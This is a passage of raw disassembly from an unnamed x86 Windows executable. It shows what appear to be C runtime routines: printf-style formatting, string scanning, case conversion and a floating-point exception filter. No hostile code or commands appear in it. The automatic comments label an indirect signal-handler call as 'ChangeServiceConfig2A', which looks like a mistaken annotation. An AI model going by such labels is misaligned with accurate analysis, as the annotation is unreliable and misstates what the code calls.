mov [ebp+var_C], ecx
loc_405B8E: ; CODE XREF: sub_405917+26C�j
mov [ebp+var_2C], 1
mov eax, ecx
loc_405B97: ; CODE XREF: sub_405917+297�j
mov edx, esi
dec esi
test edx, edx
jz loc_405D92
cmp word ptr [eax], 0
jz loc_405D92
inc eax
inc eax
jmp short loc_405B97
; ---------------------------------------------------------------------------
loc_405BB0: ; CODE XREF: sub_405917+227�j
; sub_405917+22B�j
mov [ebp+var_40], 1
add bl, 20h
loc_405BBA: ; CODE XREF: sub_405917+207�j
or [ebp+var_4], 40h
cmp [ebp+var_8], 0
lea edi, [ebp+var_24C]
mov [ebp+var_C], edi
jge loc_405C9E
mov [ebp+var_8], 6
jmp loc_405CE3
; ---------------------------------------------------------------------------
loc_405BDD: ; CODE XREF: sub_405917+21F�j
test word ptr [ebp+var_4], 830h
jnz short loc_405BE8
or [ebp+var_4], edi
loc_405BE8: ; CODE XREF: sub_405917+2CC�j
; sub_405917+30A�j
test word ptr [ebp+var_4], 810h
lea eax, [ebp+arg_8]
push eax
jz short loc_405C2F
call sub_406170
push eax
lea eax, [ebp+var_24C]
push eax
call sub_407B3E
add esp, 0Ch
mov [ebp+var_10], eax
test eax, eax
jge short loc_405C42
mov [ebp+var_38], 1
jmp short loc_405C42
; ---------------------------------------------------------------------------
loc_405C19: ; CODE XREF: sub_405917+210�j
sub eax, 5Ah
jz short loc_405C50
sub eax, 9
jz short loc_405BE8
dec eax
jz loc_405E2C
jmp loc_405F6B
; ---------------------------------------------------------------------------
loc_405C2F: ; CODE XREF: sub_405917+2DB�j
call sub_406153
pop ecx
mov [ebp+var_24C], al
mov [ebp+var_10], 1
loc_405C42: ; CODE XREF: sub_405917+2F7�j
; sub_405917+300�j
lea eax, [ebp+var_24C]
mov [ebp+var_C], eax
jmp loc_405F6B
; ---------------------------------------------------------------------------
loc_405C50: ; CODE XREF: sub_405917+305�j
lea eax, [ebp+arg_8]
push eax
call sub_406153
test eax, eax
pop ecx
jz short loc_405C90
mov ecx, [eax+4]
test ecx, ecx
jz short loc_405C90
test [ebp+var_4], edi
jz short loc_405C81
movsx eax, word ptr [eax]
shr eax, 1
mov [ebp+var_C], ecx
mov [ebp+var_10], eax
mov [ebp+var_2C], 1
jmp loc_405F6B
; ---------------------------------------------------------------------------
loc_405C81: ; CODE XREF: sub_405917+351�j
and [ebp+var_2C], 0
mov [ebp+var_C], ecx
movsx eax, word ptr [eax]
jmp loc_405F68
; ---------------------------------------------------------------------------
loc_405C90: ; CODE XREF: sub_405917+345�j
; sub_405917+34C�j
mov eax, off_40DA78
mov [ebp+var_C], eax
push eax
jmp loc_405D48
; ---------------------------------------------------------------------------
loc_405C9E: ; CODE XREF: sub_405917+2B4�j
jnz short loc_405CAE
cmp bl, 67h
jnz short loc_405CE3
mov [ebp+var_8], 1
jmp short loc_405CE3
; ---------------------------------------------------------------------------
loc_405CAE: ; CODE XREF: sub_405917:loc_405C9E�j
cmp [ebp+var_8], edx
jle short loc_405CB6
mov [ebp+var_8], edx
loc_405CB6: ; CODE XREF: sub_405917+39A�j
cmp [ebp+var_8], 0A3h
jle short loc_405CE3
mov eax, [ebp+var_8]
add eax, 15Dh
push eax
call sub_40345E
test eax, eax
pop ecx
mov [ebp+var_30], eax
jz short loc_405CDC
mov edi, eax
mov [ebp+var_C], edi
jmp short loc_405CE3
; ---------------------------------------------------------------------------
loc_405CDC: ; CODE XREF: sub_405917+3BC�j
mov [ebp+var_8], 0A3h
loc_405CE3: ; CODE XREF: sub_405917+2C1�j
; sub_405917+38C�j ...
mov eax, [ebp+arg_8]
push [ebp+var_40]
add eax, 8
mov [ebp+arg_8], eax
push [ebp+var_8]
mov ecx, [eax-8]
mov [ebp+var_4C], ecx
mov eax, [eax-4]
mov [ebp+var_48], eax
movsx eax, bl
push eax
lea eax, [ebp+var_4C]
push edi
push eax
call off_40E160
mov esi, [ebp+var_4]
add esp, 14h
and esi, 80h
jz short loc_405D29
cmp [ebp+var_8], 0
jnz short loc_405D29
push edi
call off_40E16C
pop ecx
loc_405D29: ; CODE XREF: sub_405917+402�j
; sub_405917+408�j
cmp bl, 67h
jnz short loc_405D3A
test esi, esi
jnz short loc_405D3A
push edi
call off_40E164
pop ecx
loc_405D3A: ; CODE XREF: sub_405917+415�j
; sub_405917+419�j
cmp byte ptr [edi], 2Dh
jnz short loc_405D47
or byte ptr [ebp+var_4+1], 1
inc edi
mov [ebp+var_C], edi
loc_405D47: ; CODE XREF: sub_405917+426�j
push edi
loc_405D48: ; CODE XREF: sub_405917+382�j
call sub_403B90
pop ecx
jmp loc_405F68
; ---------------------------------------------------------------------------
loc_405D53: ; CODE XREF: sub_405917+1FE�j
sub eax, 69h
jz loc_405E2C
sub eax, 5
jz loc_405E02
dec eax
jz loc_405DF0
dec eax
jz short loc_405DC0
sub eax, 3
jz loc_405B58
dec eax
dec eax
jz loc_405E30
sub eax, 3
jnz loc_405F6B
mov [ebp+var_34], 27h
jmp short loc_405DCE
; ---------------------------------------------------------------------------
loc_405D92: ; CODE XREF: sub_405917+285�j
; sub_405917+28F�j
sub eax, ecx
sar eax, 1
jmp loc_405F68
; ---------------------------------------------------------------------------
loc_405D9B: ; CODE XREF: sub_405917+264�j
test ecx, ecx
jnz short loc_405DA8
mov ecx, off_40DA78
mov [ebp+var_C], ecx
loc_405DA8: ; CODE XREF: sub_405917+486�j
mov eax, ecx
loc_405DAA: ; CODE XREF: sub_405917+4A0�j
mov edx, esi
dec esi
test edx, edx
jz short loc_405DB9
cmp byte ptr [eax], 0
jz short loc_405DB9
inc eax
jmp short loc_405DAA
; ---------------------------------------------------------------------------
loc_405DB9: ; CODE XREF: sub_405917+498�j
; sub_405917+49D�j
sub eax, ecx
jmp loc_405F68
; ---------------------------------------------------------------------------
loc_405DC0: ; CODE XREF: sub_405917+456�j
mov [ebp+var_8], 8
loc_405DC7: ; CODE XREF: sub_405917+216�j
mov [ebp+var_34], 7
loc_405DCE: ; CODE XREF: sub_405917+479�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_10], 10h
jz short loc_405E37
mov al, byte ptr [ebp+var_34]
mov [ebp+var_16], 30h
add al, 51h
mov [ebp+var_24], 2
mov [ebp+var_15], al
jmp short loc_405E37
; ---------------------------------------------------------------------------
loc_405DF0: ; CODE XREF: sub_405917+44F�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_10], 8
jz short loc_405E37
or [ebp+var_4], edx
jmp short loc_405E37
; ---------------------------------------------------------------------------
loc_405E02: ; CODE XREF: sub_405917+448�j
lea eax, [ebp+arg_8]
push eax
call sub_406153
test byte ptr [ebp+var_4], 20h
pop ecx
jz short loc_405E1B
mov cx, word ptr [ebp+var_14]
mov [eax], cx
jmp short loc_405E20
; ---------------------------------------------------------------------------
loc_405E1B: ; CODE XREF: sub_405917+4F9�j
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_405E20: ; CODE XREF: sub_405917+502�j
mov [ebp+var_38], 1
jmp loc_406069
; ---------------------------------------------------------------------------
loc_405E2C: ; CODE XREF: sub_405917+30D�j
; sub_405917+43F�j
or [ebp+var_4], 40h
loc_405E30: ; CODE XREF: sub_405917+463�j
mov [ebp+var_10], 0Ah
loc_405E37: ; CODE XREF: sub_405917+4C2�j
; sub_405917+4D7�j ...
test byte ptr [ebp+var_4+1], 80h
jz short loc_405E49
lea eax, [ebp+arg_8]
push eax
call sub_406160
pop ecx
jmp short loc_405E8A
; ---------------------------------------------------------------------------
loc_405E49: ; CODE XREF: sub_405917+524�j
test byte ptr [ebp+var_4], 20h
jz short loc_405E70
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_405E65
call sub_406153
pop ecx
movsx eax, ax
loc_405E62: ; CODE XREF: sub_405917+557�j
; sub_405917+569�j
cdq
jmp short loc_405E8A
; ---------------------------------------------------------------------------
loc_405E65: ; CODE XREF: sub_405917+540�j
call sub_406153
pop ecx
movzx eax, ax
jmp short loc_405E62
; ---------------------------------------------------------------------------
loc_405E70: ; CODE XREF: sub_405917+536�j
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_405E82
call sub_406153
pop ecx
jmp short loc_405E62
; ---------------------------------------------------------------------------
loc_405E82: ; CODE XREF: sub_405917+561�j
call sub_406153
pop ecx
xor edx, edx
loc_405E8A: ; CODE XREF: sub_405917+530�j
; sub_405917+54C�j
test byte ptr [ebp+var_4], 40h
jz short loc_405EAD
test edx, edx
jg short loc_405EAD
jl short loc_405E9A
test eax, eax
jnb short loc_405EAD
loc_405E9A: ; CODE XREF: sub_405917+57D�j
neg eax
adc edx, 0
mov [ebp+var_20], eax
neg edx
or byte ptr [ebp+var_4+1], 1
mov [ebp+var_1C], edx
jmp short loc_405EB3
; ---------------------------------------------------------------------------
loc_405EAD: ; CODE XREF: sub_405917+577�j
; sub_405917+57B�j ...
mov [ebp+var_20], eax
mov [ebp+var_1C], edx
loc_405EB3: ; CODE XREF: sub_405917+594�j
test byte ptr [ebp+var_4+1], 80h
jnz short loc_405EBD
and [ebp+var_1C], 0
loc_405EBD: ; CODE XREF: sub_405917+5A0�j
cmp [ebp+var_8], 0
jge short loc_405ECC
mov [ebp+var_8], 1
jmp short loc_405EDD
; ---------------------------------------------------------------------------
loc_405ECC: ; CODE XREF: sub_405917+5AA�j
and [ebp+var_4], 0FFFFFFF7h
mov eax, 200h
cmp [ebp+var_8], eax
jle short loc_405EDD
mov [ebp+var_8], eax
loc_405EDD: ; CODE XREF: sub_405917+5B3�j
; sub_405917+5C1�j
mov eax, [ebp+var_20]
or eax, [ebp+var_1C]
jnz short loc_405EE9
and [ebp+var_24], 0
loc_405EE9: ; CODE XREF: sub_405917+5CC�j
lea eax, [ebp+var_4D]
mov [ebp+var_C], eax
loc_405EEF: ; CODE XREF: sub_405917+627�j
mov eax, [ebp+var_8]
dec [ebp+var_8]
test eax, eax
jg short loc_405F01
mov eax, [ebp+var_20]
or eax, [ebp+var_1C]
jz short loc_405F40
loc_405F01: ; CODE XREF: sub_405917+5E0�j
mov eax, [ebp+var_10]
cdq
mov edi, edx
mov esi, eax
push edi
push esi
push [ebp+var_1C]
push [ebp+var_20]
call sub_407C20
push edi
push esi
push [ebp+var_1C]
mov ebx, eax
add ebx, 30h
push [ebp+var_20]
call sub_407BB0
cmp ebx, 39h
mov [ebp+var_20], eax
mov [ebp+var_1C], edx
jle short loc_405F36
add ebx, [ebp+var_34]
loc_405F36: ; CODE XREF: sub_405917+61A�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
mov [eax], bl
jmp short loc_405EEF
; ---------------------------------------------------------------------------
loc_405F40: ; CODE XREF: sub_405917+5E8�j
lea eax, [ebp+var_4D]
sub eax, [ebp+var_C]
inc [ebp+var_C]
test byte ptr [ebp+var_4+1], 2
mov [ebp+var_10], eax
jz short loc_405F6B
mov ecx, [ebp+var_C]
cmp byte ptr [ecx], 30h
jnz short loc_405F5E
test eax, eax
jnz short loc_405F6B
loc_405F5E: ; CODE XREF: sub_405917+641�j
dec [ebp+var_C]
inc eax
mov ecx, [ebp+var_C]
mov byte ptr [ecx], 30h
loc_405F68: ; CODE XREF: sub_405917+374�j
; sub_405917+437�j ...
mov [ebp+var_10], eax
loc_405F6B: ; CODE XREF: sub_405917+230�j
; sub_405917+313�j ...
cmp [ebp+var_38], 0
jnz loc_406069
mov ebx, [ebp+var_4]
test bl, 40h
jz short loc_405FA3
test bh, 1
jz short loc_405F88
mov [ebp+var_16], 2Dh
jmp short loc_405F9C
; ---------------------------------------------------------------------------
loc_405F88: ; CODE XREF: sub_405917+669�j
test bl, 1
jz short loc_405F93
mov [ebp+var_16], 2Bh
jmp short loc_405F9C
; ---------------------------------------------------------------------------
loc_405F93: ; CODE XREF: sub_405917+674�j
test bl, 2
jz short loc_405FA3
mov [ebp+var_16], 20h
loc_405F9C: ; CODE XREF: sub_405917+66F�j
; sub_405917+67A�j
mov [ebp+var_24], 1
loc_405FA3: ; CODE XREF: sub_405917+664�j
; sub_405917+67F�j
mov esi, [ebp+var_28]
sub esi, [ebp+var_24]
sub esi, [ebp+var_10]
test bl, 0Ch
jnz short loc_405FC3
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_4060EA
add esp, 10h
loc_405FC3: ; CODE XREF: sub_405917+698�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_16]
push [ebp+arg_0]
push [ebp+var_24]
push eax
call sub_40611B
add esp, 10h
test bl, 8
jz short loc_405FF5
test bl, 4
jnz short loc_405FF5
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 30h
call sub_4060EA
add esp, 10h
loc_405FF5: ; CODE XREF: sub_405917+6C5�j
; sub_405917+6CA�j
cmp [ebp+var_2C], 0
jz short loc_40603C
cmp [ebp+var_10], 0
jle short loc_40603C
mov eax, [ebp+var_10]
mov ebx, [ebp+var_C]
lea edi, [eax-1]
loc_40600A: ; CODE XREF: sub_405917+721�j
mov ax, [ebx]
inc ebx
push eax
lea eax, [ebp+var_44]
push eax
inc ebx
call sub_407B3E
pop ecx
test eax, eax
pop ecx
jle short loc_406051
lea ecx, [ebp+var_14]
push ecx
push [ebp+arg_0]
push eax
lea eax, [ebp+var_44]
push eax
call sub_40611B
add esp, 10h
mov eax, edi
dec edi
test eax, eax
jnz short loc_40600A
jmp short loc_406051
; ---------------------------------------------------------------------------
loc_40603C: ; CODE XREF: sub_405917+6E2�j
; sub_405917+6E8�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push [ebp+var_10]
push [ebp+var_C]
call sub_40611B
add esp, 10h
loc_406051: ; CODE XREF: sub_405917+706�j
; sub_405917+723�j
test byte ptr [ebp+var_4], 4
jz short loc_406069
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_4060EA
add esp, 10h
loc_406069: ; CODE XREF: sub_405917+510�j
; sub_405917+658�j ...
cmp [ebp+var_30], 0
jz short loc_40607C ; default
push [ebp+var_30]
call sub_403B18
and [ebp+var_30], 0
pop ecx
loc_40607C: ; CODE XREF: sub_405917+76�j
; sub_405917+9B�j ...
mov esi, [ebp+arg_4] ; default
mov bl, [esi]
inc esi
test bl, bl
mov [ebp+arg_4], esi
jnz loc_40594B
loc_40608D: ; CODE XREF: sub_405917+22�j
; sub_405917+45�j
mov eax, [ebp+var_14]
pop edi
pop esi
pop ebx
leave
retn
sub_405917 endp
; ---------------------------------------------------------------------------
off_406095 dd offset loc_405ACA ; DATA XREF: sub_405917+7C�r
dd offset loc_40599A ; jump table for switch statement
dd offset loc_4059B7
dd offset loc_405A03
dd offset loc_405A3A
dd offset loc_405A43
dd offset loc_405A7B
dd offset loc_405B0F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4060B5 proc near ; CODE XREF: sub_405917+1D2�p
; sub_405917+1EB�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
dec dword ptr [ecx+4]
js short loc_4060CE
mov edx, [ecx]
mov al, byte ptr [ebp+arg_0]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_4060D9
; ---------------------------------------------------------------------------
loc_4060CE: ; CODE XREF: sub_4060B5+9�j
push ecx
push [ebp+arg_0]
call sub_405802
pop ecx
pop ecx
loc_4060D9: ; CODE XREF: sub_4060B5+17�j
cmp eax, 0FFFFFFFFh
mov eax, [ebp+arg_8]
jnz short loc_4060E6
or dword ptr [eax], 0FFFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4060E6: ; CODE XREF: sub_4060B5+2A�j
inc dword ptr [eax]
pop ebp
retn
sub_4060B5 endp
; =============== S U B R O U T I N E =======================================
sub_4060EA proc near ; CODE XREF: sub_405917+6A4�p
; sub_405917+6D6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push edi
mov edi, [esp+8+arg_4]
mov eax, edi
dec edi
test eax, eax
jle short loc_406118
mov esi, [esp+8+arg_C]
loc_4060FB: ; CODE XREF: sub_4060EA+2C�j
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_0]
call sub_4060B5
add esp, 0Ch
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_406118
mov eax, edi
dec edi
test eax, eax
jg short loc_4060FB
loc_406118: ; CODE XREF: sub_4060EA+B�j
; sub_4060EA+25�j
pop edi
pop esi
retn
sub_4060EA endp
; =============== S U B R O U T I N E =======================================
sub_40611B proc near ; CODE XREF: sub_405917+6BA�p
; sub_405917+714�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov ebx, [esp+4+arg_4]
mov eax, ebx
dec ebx
push esi
push edi
test eax, eax
jle short loc_40614F
mov edi, [esp+0Ch+arg_C]
mov esi, [esp+0Ch+arg_0]
loc_406131: ; CODE XREF: sub_40611B+32�j
movsx eax, byte ptr [esi]
push edi
inc esi
push [esp+10h+arg_8]
push eax
call sub_4060B5
add esp, 0Ch
cmp dword ptr [edi], 0FFFFFFFFh
jz short loc_40614F
mov eax, ebx
dec ebx
test eax, eax
jg short loc_406131
loc_40614F: ; CODE XREF: sub_40611B+C�j
; sub_40611B+2B�j
pop edi
pop esi
pop ebx
retn
sub_40611B endp
; =============== S U B R O U T I N E =======================================
sub_406153 proc near ; CODE XREF: sub_405917+F5�p
; sub_405917+135�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
sub_406153 endp
; =============== S U B R O U T I N E =======================================
sub_406160 proc near ; CODE XREF: sub_405917+52A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
sub_406160 endp
; =============== S U B R O U T I N E =======================================
sub_406170 proc near ; CODE XREF: sub_405917+2DD�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
sub_406170 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40617E proc near ; CODE XREF: sub_403DA0+17�p
; sub_403DA0+58�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_40619C
mov ecx, off_40DA80
movzx eax, word ptr [ecx+eax*2]
jmp short loc_4061EE
; ---------------------------------------------------------------------------
loc_40619C: ; CODE XREF: sub_40617E+10�j
mov ecx, eax
push esi
mov esi, off_40DA80
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_4061C1
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_4061CA
; ---------------------------------------------------------------------------
loc_4061C1: ; CODE XREF: sub_40617E+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_4061CA: ; CODE XREF: sub_40617E+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_407C95
add esp, 1Ch
test eax, eax
jnz short loc_4061EA
leave
retn
; ---------------------------------------------------------------------------
loc_4061EA: ; CODE XREF: sub_40617E+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_4061EE: ; CODE XREF: sub_40617E+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_40617E endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+8]
mov ecx, [esp+10h]
or ecx, eax
mov ecx, [esp+0Ch]
jnz short loc_406219
mov eax, [esp+4]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_406219: ; CODE XREF: seg001:0040620E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+8]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, [esp+8]
mul ecx
add edx, ebx
pop ebx
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406234 proc near ; CODE XREF: seg001:0040415C�p
; seg001:00404166�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_40E480, 0
push ebx
push esi
push edi
jnz short loc_406261
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_4062FA
cmp eax, 5Ah
jg loc_4062FA
add eax, 20h
jmp loc_4062FA
; ---------------------------------------------------------------------------
loc_406261: ; CODE XREF: sub_406234+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_406295
cmp dword_40DC8C, esi
jle short loc_406283
push esi
push ebx
call sub_40617E
pop ecx
pop ecx
jmp short loc_40628D
; ---------------------------------------------------------------------------
loc_406283: ; CODE XREF: sub_406234+42�j
mov eax, off_40DA80
mov al, [eax+ebx*2]
and eax, esi
loc_40628D: ; CODE XREF: sub_406234+4D�j
test eax, eax
jnz short loc_406295
loc_406291: ; CODE XREF: sub_406234+AD�j
mov eax, ebx
jmp short loc_4062FA
; ---------------------------------------------------------------------------
loc_406295: ; CODE XREF: sub_406234+3A�j
; sub_406234+5B�j
mov edx, off_40DA80
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_4062B9
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_4062C2
; ---------------------------------------------------------------------------
loc_4062B9: ; CODE XREF: sub_406234+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_4062C2: ; CODE XREF: sub_406234+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push dword_40E480
call sub_407DDE
add esp, 20h
test eax, eax
jz short loc_406291
cmp eax, esi
jnz short loc_4062ED
movzx eax, [ebp+var_4]
jmp short loc_4062FA
; ---------------------------------------------------------------------------
loc_4062ED: ; CODE XREF: sub_406234+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_4062FA: ; CODE XREF: sub_406234+16�j
; sub_406234+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_406234 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_406310
loc_406300: ; CODE XREF: sub_406310+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_406310
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406310 proc near ; CODE XREF: sub_404387+F7�p
; sub_4093FF+12�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00406300 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_406316: ; CODE XREF: sub_404180+6E�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_40633B
loc_406328: ; CODE XREF: sub_406310+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_406300
test cl, cl
jz short loc_406384
test edx, 3
jnz short loc_406328
loc_40633B: ; CODE XREF: sub_406310+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_406346: ; CODE XREF: sub_406310+61�j
; sub_406310+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_406388
and eax, 81010100h
jz short loc_406346
and eax, 1010100h
jnz short loc_406382
and esi, 80000000h
jnz short loc_406346
loc_406382: ; CODE XREF: sub_406310+68�j
; sub_406310+81�j ...
pop esi
pop edi
loc_406384: ; CODE XREF: sub_406310+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_406388: ; CODE XREF: sub_406310+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_4063C5
test al, al
jz short loc_406382
cmp ah, bl
jz short loc_4063BE
test ah, ah
jz short loc_406382
shr eax, 10h
cmp al, bl
jz short loc_4063B7
test al, al
jz short loc_406382
cmp ah, bl
jz short loc_4063B0
test ah, ah
jz short loc_406382
jmp short loc_406346
; ---------------------------------------------------------------------------
loc_4063B0: ; CODE XREF: sub_406310+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4063B7: ; CODE XREF: sub_406310+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4063BE: ; CODE XREF: sub_406310+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4063C5: ; CODE XREF: sub_406310+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_406310 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4063CC proc near ; CODE XREF: sub_404200+E3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_40650D
test eax, eax
pop ecx
jz loc_406501
mov ebx, [eax+8]
test ebx, ebx
jz loc_406501
cmp ebx, 5
jnz short loc_4063FD
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_40650A
; ---------------------------------------------------------------------------
loc_4063FD: ; CODE XREF: sub_4063CC+23�j
cmp ebx, 1
jz loc_4064FC
mov ecx, dword_40E498
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov dword_40E498, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_4064EC
mov ecx, dword_40DD18
mov edx, dword_40DD1C
add edx, ecx
push esi
cmp ecx, edx
jge short loc_40644C
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:40DCA8h[esi*4]
loc_406443: ; CODE XREF: sub_4063CC+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_406443
loc_40644C: ; CODE XREF: sub_4063CC+69�j
mov eax, [eax]
mov esi, dword_40DD24
cmp eax, 0C000008Eh
jnz short loc_406467
mov dword_40DD24, 83h
jmp short loc_4064D7
; ---------------------------------------------------------------------------
loc_406467: ; CODE XREF: sub_4063CC+8D�j
cmp eax, 0C0000090h
jnz short loc_40647A
mov dword_40DD24, 81h
jmp short loc_4064D7
; ---------------------------------------------------------------------------
loc_40647A: ; CODE XREF: sub_4063CC+A0�j
cmp eax, 0C0000091h
jnz short loc_40648D
mov dword_40DD24, 84h
jmp short loc_4064D7
; ---------------------------------------------------------------------------
loc_40648D: ; CODE XREF: sub_4063CC+B3�j
cmp eax, 0C0000093h
jnz short loc_4064A0
mov dword_40DD24, 85h
jmp short loc_4064D7
; ---------------------------------------------------------------------------
loc_4064A0: ; CODE XREF: sub_4063CC+C6�j
cmp eax, 0C000008Dh
jnz short loc_4064B3
mov dword_40DD24, 82h
jmp short loc_4064D7
; ---------------------------------------------------------------------------
loc_4064B3: ; CODE XREF: sub_4063CC+D9�j
cmp eax, 0C000008Fh
jnz short loc_4064C6
mov dword_40DD24, 86h
jmp short loc_4064D7
; ---------------------------------------------------------------------------
loc_4064C6: ; CODE XREF: sub_4063CC+EC�j
cmp eax, 0C0000092h
jnz short loc_4064D7
mov dword_40DD24, 8Ah
loc_4064D7: ; CODE XREF: sub_4063CC+99�j
; sub_4063CC+AC�j ...
push dword_40DD24
push 8
call ebx ; ChangeServiceConfig2A
pop ecx
mov dword_40DD24, esi
pop ecx
pop esi
jmp short loc_4064F4
; ---------------------------------------------------------------------------
loc_4064EC: ; CODE XREF: sub_4063CC+52�j
and dword ptr [eax+8], 0
push ecx
call ebx ; ChangeServiceConfig2A
pop ecx
loc_4064F4: ; CODE XREF: sub_4063CC+11E�j
mov eax, [ebp+arg_0]
mov dword_40E498, eax
loc_4064FC: ; CODE XREF: sub_4063CC+34�j
or eax, 0FFFFFFFFh
jmp short loc_40650A
; ---------------------------------------------------------------------------
loc_406501: ; CODE XREF: sub_4063CC+F�j
; sub_4063CC+1A�j
push [ebp+arg_4]
call dword_40A158 ; UnhandledExceptionFilter
loc_40650A: ; CODE XREF: sub_4063CC+2C�j
; sub_4063CC+133�j
pop ebx
pop ebp
retn
sub_4063CC endp
; =============== S U B R O U T I N E =======================================
sub_40650D proc near ; CODE XREF: sub_4063CC+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_40DD20
cmp dword_40DCA0, edx
push esi
mov eax, offset dword_40DCA0
jz short loc_40653A
lea esi, [ecx+ecx*2]
lea esi, ds:40DCA0h[esi*4]
loc_40652F: ; CODE XREF: sub_40650D+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_40653A
cmp [eax], edx
jnz short loc_40652F
loc_40653A: ; CODE XREF: sub_40650D+16�j
; sub_40650D+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:40DCA0h[ecx*4]
cmp eax, ecx
jnb short loc_40654D
cmp [eax], edx
jz short locret_40654F
loc_40654D: ; CODE XREF: sub_40650D+3A�j
xor eax, eax
locret_40654F: ; CODE XREF: sub_40650D+3E�j
retn
